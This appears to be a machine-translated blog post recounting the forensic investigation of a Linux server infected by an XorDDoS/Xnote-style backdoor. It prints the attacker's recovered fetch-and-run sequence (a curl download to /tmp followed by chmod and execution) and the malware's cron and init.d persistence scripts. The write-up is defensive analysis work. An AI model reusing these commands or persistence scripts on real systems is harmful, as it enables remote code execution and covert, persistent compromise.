서버의 공격

서버가 다운되어 ssh를 연결할 수 없습니다. 방법이 없습니다. 기계실에 가보니 서버가 마지막으로 실행된 몇 가지 명령을 계속 켜고 있습니다.

#  root 
history > history.log

#  
curl ****/  /tmp/hei
chmod 744 hei
./hei

여기에 몇 가지 문제가 있습니다.

다운로드hei 파일의 ip 주소를 보았습니다. 강소성에 있는 것이지만 저희 서버는 내부에서 사용되고 외부 네트워크에 접근할 수 없습니다

정상적인 사용자라면 hei 파일이 /tmp 폴더에 다운로드되는 이유

history의 역사를 저장한 후에 서버를 리셋했지만 핑이 다르고 카드를 리셋했습니다.

#  
service network restart

모든 것이 막 시작되었다.

메일부터.

이대로 끝날 줄 알았는데...어느 날 나는 루트 사용자가 항상 한 통의 메일을 받는데 대략 200통이 넘는다는 것을 발견했다. 내용은 같고 나는 수동으로 그것들을 삭제했다.
그러나 얼마 후, 나는 또 여러 통의 같은 우편물을 받았다.
메일을 자세히 보고 알겠습니다. 아래의 명령이 실행에 실패했습니다!

#  
mail

#  
& more  

cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug

/etc/cron.hourly

이 디렉터리에서 이cron을 발견했습니다.sh 파일

cd /etc/cron.hourly

#  
stat cron.sh

etc/cron.hourly/cron.sh 파일 내용

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`;do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug

for 순환이라는 명령은 모든 네트워크 카드를 다시 시작하는 것이 분명하다.
이 파일이 존재하지 않습니다.그래서cp라는 명령은 항상 실패하고 로그 시스템이 작용하기 때문에 시간마다 루트 계정에 메일을 보냅니다.
이 파일을 삭제한 후에 과연 다시 메일을 보내지 않았다

난 또 끝난 줄 알았어.

왜 /lib/udev/udev 이 파일이 사라졌는지 모르겠습니다. /lib/udev/udev 명령을 실행하고 시스템을 업데이트해서 이 파일이 없어졌기 때문입니까?원인을 나는 전혀 모른다.
그러나, 어쨌든, 더 이상 메일을 보내지 않았습니다...

운명의 만남, 이것이 하늘의 뜻입니까

네트워크 명령부터

시간이 좀 지나서 인터넷 명령을 좀 배우고 싶어요.yum update 명령을 사용할 때, 나는 갑자기 매우 이상한 IP 주소를 발견했다.

ss -p

#  * 
SYN-SENT 0 1 *.*.*.*:50533  61.160.211.197:uaac users:(("654",21110,5))

여러 번 실행될 때ss 이 포트가 끊임없이 바뀔 것50533 여러 가지 징후가 당신의 서버가 연결을 시도하고 있음을 나타낸다SYN-SENT

where are you

#  ip pid
netstat -p | less

#  ， 
ps -aux | grep pid
#  
ps -ef | grep pid

#  
kill -9 pid

그러나 프로세스는 죽일 수 없었고, 몇 분 후에 다시 시작되었다

/etc/init.d

이 디렉터리를 검사하려면 파일을 숨겨야 합니다. 위의stat의 명령과 시스템이 다운되는 시간에 따라 시스템이 03월 21일에 공격을 받았음을 기본적으로 확인할 수 있습니다.

#  3/21 
touch -t 201603210000.00 TT
find . -newer TT

#  ls， 
ls -al

다음과 같은 의문의 파일 61.160.211.197:uaac 이 발견되었습니다.

#!/bin/sh
# chkconfig: 12345 90 90
# description: .chinaz{1458543822
### BEGIN INIT INFO
# Provides:             .chinaz{1458543822
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    .chinaz{1458543822
### END INIT INFO
case $1 in
start)
        /tmp/.chinaz{1458543822
        ;;
stop)
        ;;
*)
        /tmp/.chinaz{1458543822
        ;;
esac

이 서비스는 .chinaz\{1458543822할 수 없고 서비스의 스크립트는 stop에 있습니다. 제가 발견했을 때 이 스크립트는 이미 없습니다.하지만 전원을 켤 때 자동으로 생성될 것이다.그러나 우리는 여전히 얻은 것이 있다. 이것은 자동 시작 스크립트이다. 운행 단계 12345, 운행 번호 90
가장 중요한 것은: 우리는 의미 있는 이름을 얻었다/tmp. 그것은 자신의 진짜 이름을 폭로했다!!!
아주 오래된 마법 시대에, 어떤 신중한 무당도 자신의 진명 실성을 가장 소중히 여길 만한 밀장으로 간주하였으며, 동시에 자신의 생명에 대한 가장 큰 위협이기도 했다.

나타나라

발췌하다http://news.drweb.com/show/?i=9272&lng=en&c=5 To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. 이 페이지는 이 바이러스를 소개했는데 리눅스입니다.BackDoor.Xnote.1의 변종.
Linux.BackDoor.Xnote.일:http://vms.drweb.com/virus/?_is=1&i=4323517

새로운 의혹, 모든 것이 아직 끝나지 않았다...

이것이 너의 진짜 이름이냐!

내장형 Rookit을 숨긴 DDoS 목마 분석http://www.freebuf.com/articles/system/58836.html
XorDDos 패밀리:http://www.aptno1.com/YC/102.html
https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html
Linux에서 무작위 10자 바이러스 제거http://blog.chinaunix.net/uid-20332519-id-4941140.html